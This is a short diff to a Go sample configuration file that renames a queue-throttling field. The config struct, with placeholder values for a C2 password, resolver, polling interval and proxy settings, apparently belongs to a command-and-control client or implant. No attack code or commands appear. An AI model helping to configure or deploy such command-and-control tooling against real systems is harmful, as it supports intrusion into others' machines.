--- a/config/config.go.sample
+++ b/config/config.go.sample
@@ -7,7 +7,7 @@ type Config struct {
 	C2Password      string
 	Resolver        string
 	C2Interval      int
-    ThrottledSendQ  bool
+    ThrottleSendQ  bool
 	ProxyEnabled    bool
 	ProxyUrl        string
 	ProxyKey        string
@@ -18,7 +18,7 @@ func (c *Config) Init() {
 	c.C2Password = "[C2_PASSWORD]"
 	c.Resolver = "[RESOLVER]"
 	c.C2Interval = 5000
-	c.ThrottledSendQ = false
+	c.ThrottleSendQ = false
 	c.ProxyEnabled = false
 	c.ProxyUrl = "[PROXY_URL]"
 	c.ProxyKey = "[PROXY_KEY]"
